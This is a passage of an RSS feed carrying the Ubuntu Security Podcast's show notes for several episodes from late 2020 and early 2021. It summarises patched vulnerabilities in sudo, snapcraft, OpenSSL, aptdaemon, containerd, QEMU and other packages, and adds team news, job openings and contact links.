<li><a href="https://ubuntu.com/security/CVE-2017-14245">CVE-2017-14245</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12562">CVE-2017-12562</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4705-1-sudo-vulnerabilities-04-06">[<a href="https://ubuntu.com/security/notices/USN-4705-1">USN-4705-1</a>] Sudo vulnerabilities [04:06]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23239">CVE-2021-23239</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3156">CVE-2021-3156</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://www.openwall.com/lists/oss-security/2021/01/26/3">https://www.openwall.com/lists/oss-security/2021/01/26/3</a></li>
<li><a href="https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit">https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit</a></li>
<li>Qualys discovered a heap based buffer overflow in command-line argument
parsing in sudo that has existed since July 2011</li>
<li>sudo is setuid root so anyone who executes it is then running a process
as root - so if a user can exploit a vuln in sudo to get code execution,
can get code execution as root as so escalate privileges to root</li>
<li>Requires to execute sudo as `sudoedit -s` since this then ensures the right
mode is automatically set so that the vulnerability is active</li>
<li>Developed 3 different exploits for this vulnerability against various
Linux distros (Ubuntu 20.04, Debian 10, Fedora 33 etc)</li>
<li>ASLR helps to make this harder to exploit since it randomises the
location of the environment variables in memory etc but assuming an
unprivileged user can run the exploit multiple times they can eventually
exploit it</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-discusses-the-solarwinds-hack-with-special-guest-joe-mcmanus-07-03">Alex discusses the SolarWinds hack with special guest Joe McManus [07:03]</h3>
<ul>
<li>Joe is now CISO at Drizly</li>
<li><a href="https://www.zdnet.com/article/microsoft-fireeye-confirm-solarwinds-supply-chain-attack/">https://www.zdnet.com/article/microsoft-fireeye-confirm-solarwinds-supply-chain-attack/</a></li>
<li><a href="https://srslyriskybiz.substack.com/p/newsletter38">https://srslyriskybiz.substack.com/p/newsletter38</a></li>
</ul>
<h3 id="private-home-directories-for-ubuntu-21-dot-04">Private home directories for Ubuntu 21.04</h3>
<ul>
<li><a href="https://ubuntusecuritypodcast.org/episode-98/">Episode 98</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="engineering-director-ubuntu-security">Engineering Director - Ubuntu Security</h4>
<ul>
<li><a href="https://canonical.com/careers/2439068">https://canonical.com/careers/2439068</a></li>
</ul>
<h4 id="engineering-manager-ubuntu-security">Engineering Manager - Ubuntu Security</h4>
<ul>
<li><a href="https://canonical.com/careers/2439058">https://canonical.com/careers/2439058</a></li>
</ul>
<h4 id="apparmor-security-engineer">AppArmor Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2114847">https://canonical.com/careers/2114847</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2085468">https://canonical.com/careers/2085468</a></li>
</ul>
<h3 id="farewells">Farewells</h3>
<ul>
<li>Jamie Strandboge (jdstrand)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E101.mp3" length="18542638" type="audio/mpeg" /><itunes:duration>27:25</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 100
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-100/</link>
          <pubDate>Fri, 11 Dec 2020 17:26:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>e1033eaebcf43b593d104d0bd33a86fd88a749bc08b321000daf4430672668126f4c0196e5068563f8b199231e762e712983f19f6c7ad7ac27a4b52e76f6e246</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 100</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          For the last episode of 2020, we look back at the most "popular"
  packages on this podcast for this year as well as the biggest
  vulnerabilities from 2020, plus a BootHole presentation at Ubuntu Masters
  as well as vulnerability fixes...
        
        ]]></itunes:subtitle>
        <itunes:summary>  For the last episode of 2020, we look back at the most "popular"
  packages on this podcast for this year as well as the biggest
  vulnerabilities from 2020, plus a BootHole presentation at Ubuntu Masters
  as well as vulnerability fixes from the past week too.
  </itunes:summary>
        <description>  For the last episode of 2020, we look back at the most "popular"
  packages on this podcast for this year as well as the biggest
  vulnerabilities from 2020, plus a BootHole presentation at Ubuntu Masters
  as well as vulnerability fixes from the past week too.
  </description>
        <googleplay:description>  For the last episode of 2020, we look back at the most "popular"
  packages on this podcast for this year as well as the biggest
  vulnerabilities from 2020, plus a BootHole presentation at Ubuntu Masters
  as well as vulnerability fixes from the past week too.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>For the last episode of 2020, we look back at the most &ldquo;popular&rdquo;
packages on this podcast for this year as well as the biggest
vulnerabilities from 2020, plus a BootHole presentation at Ubuntu Masters
as well as vulnerability fixes from the past week too.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>21 unique CVEs addressed</p>
<h3 id="usn-4660-1-linux-kernel-vulnerabilities-01-04">[<a href="https://ubuntu.com/security/notices/USN-4660-1">USN-4660-1</a>] Linux kernel vulnerabilities [01:04]</h3>
<ul>
<li>10 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-4788">CVE-2020-4788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28915">CVE-2020-28915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25645">CVE-2020-25645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25643">CVE-2020-25643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25641">CVE-2020-25641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25285">CVE-2020-25285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25284">CVE-2020-25284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25211">CVE-2020-25211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14390">CVE-2020-14390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14351">CVE-2020-14351</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-99/">Episode 99</a></li>
</ul>
<h3 id="usn-4661-1-snapcraft-vulnerability-01-36">[<a href="https://ubuntu.com/security/notices/USN-4661-1">USN-4661-1</a>] Snapcraft vulnerability [01:36]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27348">CVE-2020-27348</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>itszn reported via Launchpad - LD_LIBRARY_PATH as generated by snapcraft
would contain an empty element - so cwd would be included - if an
attacker can drop a malicious library that will be loaded by a snap
(eg. libc.so) into your home dir (and since home plug is used by almost
all snaps - and is autoconnected on non-Ubuntu Core systems) would allow
the attacker to get code-execution in the context of any snap</li>
<li>Fixed in snapcraft - as part of the snap USN notification service -
notified all affected snap publishers just need to rebuild their snaps
and users will get protected via snap refresh</li>
</ul>
<h3 id="usn-4656-2-x-dot-org-x-server-vulnerabilities-04-20">[<a href="https://ubuntu.com/security/notices/USN-4656-2">USN-4656-2</a>] X.Org X Server vulnerabilities [04:20]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25712">CVE-2020-25712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14360">CVE-2020-14360</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-99/">Episode 99</a></li>
</ul>
<h3 id="usn-4662-1-openssl-vulnerability-04-34">[<a href="https://ubuntu.com/security/notices/USN-4662-1">USN-4662-1</a>] OpenSSL vulnerability [04:34]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1971">CVE-2020-1971</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL pointer dereference when comparing two GENERAL_NAMEs with an
EDIPARTYNAME - so if an attacker can cause this they can cause a crash -&gt;
DoS in any application which uses openssl for TLS handling etc - this can
be done if an attacker can get a client to check a malicious cert against
a malicious CRL - and since some apps auto-download CRLs based on URLs
presented in the cert itself this is not an unreasonable scenario - hence
high priority as the attack complexity is not high in this case</li>
</ul>
<h3 id="usn-4663-1-gdk-pixbuf-vulnerability-05-53">[<a href="https://ubuntu.com/security/notices/USN-4663-1">USN-4663-1</a>] GDK-PixBuf vulnerability [05:53]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-29385">CVE-2020-29385</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>infinite loop when handling crafted LZW compression code in gifs -&gt; DoS</li>
</ul>
<h3 id="usn-4664-1-aptdaemon-vulnerabilities-06-31">[<a href="https://ubuntu.com/security/notices/USN-4664-1">USN-4664-1</a>] Aptdaemon vulnerabilities [06:31]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27349">CVE-2020-27349</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16128">CVE-2020-16128</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Kevin Backhouse from Github reported via Launchpad</li>
<li>aptdaemon provides dbus API for installing packages - provides an
InstallFile method to install a local .deb - and uses policykit to ensure
that unprivileged users cannot use this to install packages - however,
that check only occurs <strong>after</strong> the deb has been parsed - so if there were
vulns in the parsing (which is provided by apt itself) - since aptd runs
as root could use these to get RCE - fixed by moving auth checks to occur
before parsing anything</li>
</ul>
<h3 id="usn-4665-1-curl-vulnerabilities-08-32">[<a href="https://ubuntu.com/security/notices/USN-4665-1">USN-4665-1</a>] curl vulnerabilities [08:32]</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8286">CVE-2020-8286</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8285">CVE-2020-8285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8284">CVE-2020-8284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8231">CVE-2020-8231</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues:
<ul>
<li>memory leak in handling of FTP wildcard matchings -&gt; DoS</li>
<li>failure to properly validate OCSP responses</li>
<li>incorrect handling of CONNECT_ONLY option -&gt; could end up connecting to
wrong host -&gt; info leak</li>
<li>incorrect handling of FTP PASV responses - server can respond with
alternate IP address + port to connect to -&gt; could then trick clients
into doing port-scanning on their behalf or other info gathering etc</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="look-back-over-2020-of-the-ubuntu-security-podcast">Look back over 2020 of the Ubuntu Security Podcast</h3>
<h4 id="top-20-most-featured-packages-10-09">Top 20 most featured packages [10:09]</h4>
<ul>
<li>81 Linux kernel</li>
<li>16 Firefox</li>
<li>7 PHP</li>
<li>6 Thunderbird</li>
<li>6 Samba</li>
<li>6 NSS</li>
<li>6 Django</li>
<li>5 WebKitGTK+</li>
<li>5 Tomcat</li>
<li>5 Squid</li>
<li>5 QEMU</li>
<li>5 OpenLDAP</li>
<li>5 MySQL</li>
<li>5 ClamAV</li>
<li>4 X.Org X Server</li>
<li>4 SQLite</li>
<li>4 Python</li>
<li>4 ppp</li>
<li>4 OpenSSL</li>
<li>4 OpenJDK</li>
</ul>
<h4 id="most-high-profile-vulnerabilities-12-53">Most high profile vulnerabilities [12:53]</h4>
<ul>
<li><a href="">PLATYPUS attack against Intel CPUs</a> (<a href="https://ubuntusecuritypodcast.org/episode-96/">Episode 96</a>)</li>
<li><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00435.html">BleedingTooth attack against bluez</a> (<a href="https://ubuntusecuritypodcast.org/episode-93/">Episode 93</a>)</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-93/#usn-4593-1-freetype-vulnerability-07-30">FreeType being exploited in the wild</a> (<a href="https://ubuntusecuritypodcast.org/episode-93/">Episode 93</a>)</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-84/#alex-and-joe-take-an-in-depth-and-behind-the-scenes-look-at-boothole-grub-2-08-14">BootHole attack against GRUB2</a> (<a href="https://ubuntusecuritypodcast.org/episode-84/">Episode 84</a>)</li>
</ul>
<h3 id="ubuntu-masters-4-together-we-sink-or-swim-plugging-the-boothole-14-12">Ubuntu Masters 4 - Together We Sink or Swim: Plugging the BootHole [14:12]</h3>
<ul>
<li><a href="https://www.brighttalk.com/webcast/6793/453235">https://www.brighttalk.com/webcast/6793/453235</a></li>
<li>Chris Coulson + Daniel Kiper (Oracle, upstream grub maintainer) + Jesse
Michael (Eclypsium, discovered original BootHole vuln)</li>
<li>Earlier today / yesterday</li>
</ul>
<h3 id="hiring-15-58">Hiring [15:58]</h3>
<h4 id="apparmor-security-engineer">AppArmor Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2114847">https://canonical.com/careers/2114847</a></li>
</ul>
<h4 id="engineering-director-ubuntu-security">Engineering Director - Ubuntu Security</h4>
<ul>
<li><a href="https://canonical.com/careers/2439068">https://canonical.com/careers/2439068</a></li>
</ul>
<h4 id="engineering-manager-ubuntu-security">Engineering Manager - Ubuntu Security</h4>
<ul>
<li><a href="https://canonical.com/careers/2439058">https://canonical.com/careers/2439058</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E100.mp3" length="14111732" type="audio/mpeg" /><itunes:duration>17:46</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 99
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-99/</link>
          <pubDate>Fri, 04 Dec 2020 13:45:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>0fa844c6cdb807ff9af17a962dfca6cd15d4872b142501e31bcf0a59f87d4f6f64097a47a0c32848161eebbfff3f56fa48635972e6f35baba7a82a8b1a43d6a6</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 99</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at security updates for Mutt, Thunderbird, Poppler, QEMU,
  containerd, Linux kernel &amp; more, plus we discuss the 2020 State of the
  Octoverse Security Report from Github, Launchpad GPG keyserver migration, a
  new...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at security updates for Mutt, Thunderbird, Poppler, QEMU,
  containerd, Linux kernel &amp; more, plus we discuss the 2020 State of the
  Octoverse Security Report from Github, Launchpad GPG keyserver migration, a
  new AppArmor release &amp; some open positions on the team.
  </itunes:summary>
        <description>  This week we look at security updates for Mutt, Thunderbird, Poppler, QEMU,
  containerd, Linux kernel &amp; more, plus we discuss the 2020 State of the
  Octoverse Security Report from Github, Launchpad GPG keyserver migration, a
  new AppArmor release &amp; some open positions on the team.
  </description>
        <googleplay:description>  This week we look at security updates for Mutt, Thunderbird, Poppler, QEMU,
  containerd, Linux kernel &amp; more, plus we discuss the 2020 State of the
  Octoverse Security Report from Github, Launchpad GPG keyserver migration, a
  new AppArmor release &amp; some open positions on the team.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for Mutt, Thunderbird, Poppler, QEMU,
containerd, Linux kernel &amp; more, plus we discuss the 2020 State of the
Octoverse Security Report from Github, Launchpad GPG keyserver migration, a
new AppArmor release &amp; some open positions on the team.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>68 unique CVEs addressed</p>
<h3 id="usn-4645-1-mutt-vulnerability-00-59">[<a href="https://ubuntu.com/security/notices/USN-4645-1">USN-4645-1</a>] Mutt vulnerability [00:59]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28896">CVE-2020-28896</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When connecting to an IMAP server, if the first reponse from the server
was invalid, would fail to properly terminate the connection and could
continue trying to authenticate and hence send credentials in the clear.</li>
</ul>
<h3 id="usn-4646-1-poppler-vulnerabilities-01-44">[<a href="https://ubuntu.com/security/notices/USN-4646-1">USN-4646-1</a>] poppler vulnerabilities [01:44]</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27778">CVE-2020-27778</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9959">CVE-2019-9959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13283">CVE-2019-13283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10871">CVE-2019-10871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-21009">CVE-2018-21009</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory corruption issues, all DoS-able, some RCE?</li>
</ul>
<h3 id="usn-4646-2-poppler-regression">[<a href="https://ubuntu.com/security/notices/USN-4646-2">USN-4646-2</a>] poppler regression</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10871">CVE-2019-10871</a> <!-- raw HTML omitted --></li>
<li>Some applications linked against poppler would fail - backed out this
fix for future</li>
</ul>
</li>
</ul>
<h3 id="usn-4647-1-thunderbird-vulnerabilities-02-25">[<a href="https://ubuntu.com/security/notices/USN-4647-1">USN-4647-1</a>] Thunderbird vulnerabilities [02:25]</h3>
<ul>
<li>13 CVEs addressed in Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-26968">CVE-2020-26968</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26965">CVE-2020-26965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26961">CVE-2020-26961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26960">CVE-2020-26960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26959">CVE-2020-26959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26958">CVE-2020-26958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26956">CVE-2020-26956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26953">CVE-2020-26953</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26951">CVE-2020-26951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26950">CVE-2020-26950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16012">CVE-2020-16012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15969">CVE-2020-15969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15683">CVE-2020-15683</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>78.5.0</li>
<li>Usual web rendering type vulns - denial of service, obtain sensitive
information across origins, bypass security restrictions, conduct
phishing attacks, conduct cross-site scripting (XSS) attacks, bypass
Content Security Policy (CSP) restrictions, conduct DNS rebinding
attacks, or execute arbitrary code.</li>
</ul>
<h3 id="usn-4648-1-webkitgtk-vulnerabilities-03-21">[<a href="https://ubuntu.com/security/notices/USN-4648-1">USN-4648-1</a>] WebKitGTK vulnerabilities [03:21]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9983">CVE-2020-9983</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9952">CVE-2020-9952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9951">CVE-2020-9951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9948">CVE-2020-9948</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13753">CVE-2020-13753</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>dejavu with thunderbird above - latest upstream version (2.30.3) and same sorts of
vulns - including cross-site scripting attacks, denial of service
attacks, and arbitrary code execution.</li>
</ul>
<h3 id="usn-4649-1-xdg-utils-vulnerability-03-54">[<a href="https://ubuntu.com/security/notices/USN-4649-1">USN-4649-1</a>] xdg-utils vulnerability [03:54]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27748">CVE-2020-27748</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Could cause files to be attached by not sanitizing <a href="mailto:?attach">mailto:?attach</a>= -
particularly relevant to TB - so if a user is not paying attention, could
attach say a sensitive local file to the outgoing email</li>
</ul>
<h3 id="usn-4382-2-freerdp-vulnerabilities-05-09">[<a href="https://ubuntu.com/security/notices/USN-4382-2">USN-4382-2</a>] FreeRDP vulnerabilities [05:09]</h3>
<ul>
<li>13 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13398">CVE-2020-13398</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13397">CVE-2020-13397</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13396">CVE-2020-13396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11526">CVE-2020-11526</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11525">CVE-2020-11525</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11523">CVE-2020-11523</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11522">CVE-2020-11522</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11521">CVE-2020-11521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11058">CVE-2020-11058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11048">CVE-2020-11048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11046">CVE-2020-11046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11045">CVE-2020-11045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11042">CVE-2020-11042</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-78/">Episode 78</a> - covered this for xenial, now for bionic</li>
</ul>
<h3 id="usn-4650-1-qemu-vulnerabilities-05-29">[<a href="https://ubuntu.com/security/notices/USN-4650-1">USN-4650-1</a>] QEMU vulnerabilities [05:29]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27617">CVE-2020-27617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27616">CVE-2020-27616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25723">CVE-2020-25723</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25625">CVE-2020-25625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25624">CVE-2020-25624</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25085">CVE-2020-25085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25084">CVE-2020-25084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-17380">CVE-2020-17380</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible host RCE from guest via incorrect handling of SDHCI device
emulation but mitigated when using libvirt by AppArmor profile</li>
<li>Various issues with USB and other device emulation, crash -&gt; DoS</li>
</ul>
<h3 id="usn-4651-1-mysql-vulnerabilities-06-14">[<a href="https://ubuntu.com/security/notices/USN-4651-1">USN-4651-1</a>] MySQL vulnerabilities [06:14]</h3>
<ul>
<li>Affecting Focal (20.04 LTS)</li>
<li>Tom Reynolds (tomreyn in #ubuntu-hardened) reported issue with MySQL on
20.04 had the new MySQLX plugin enabled and listenting on all network
interfaces by default -&gt; violates no open ports principle - this update
insteads changes the configuration to bind it to localhost only - if you
were using it you may now need to change your local configuration to
purposefully change this so it is remotely accessible</li>
</ul>
<h3 id="usn-4653-1-containerd-vulnerability-07-27">[<a href="https://ubuntu.com/security/notices/USN-4653-1">USN-4653-1</a>] containerd vulnerability [07:27]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15257">CVE-2020-15257</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>containerd-shim API exposed from abstract unix socket to host network
containers (in same network namespace) - would validate the effective UID
of a connecting process as 0 but did not apply other access controls - so
a malicious container in same network namespace with effective UID 0 but
otherwise reduced privileges could spawn new processes via
containerd-shim with full root privileges</li>
<li>upstream advise against running containers in the hosts network namespace</li>
<li>docker.io stops on upgrade of containerd
<ul>
<li><a href="https://discourse.ubuntu.com/t/usn-4653-1-containerd-vulnerability/19607">https://discourse.ubuntu.com/t/usn-4653-1-containerd-vulnerability/19607</a></li>
<li>manual restart</li>
<li>server team working on a fix for this</li>
</ul>
</li>
</ul>
<h3 id="usn-4652-1-sniffit-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4652-1">USN-4652-1</a>] SniffIt vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2014-5439">CVE-2014-5439</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4654-1-pear-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4654-1">USN-4654-1</a>] PEAR vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28949">CVE-2020-28949</a> <!-- raw HTML omitted --></li>
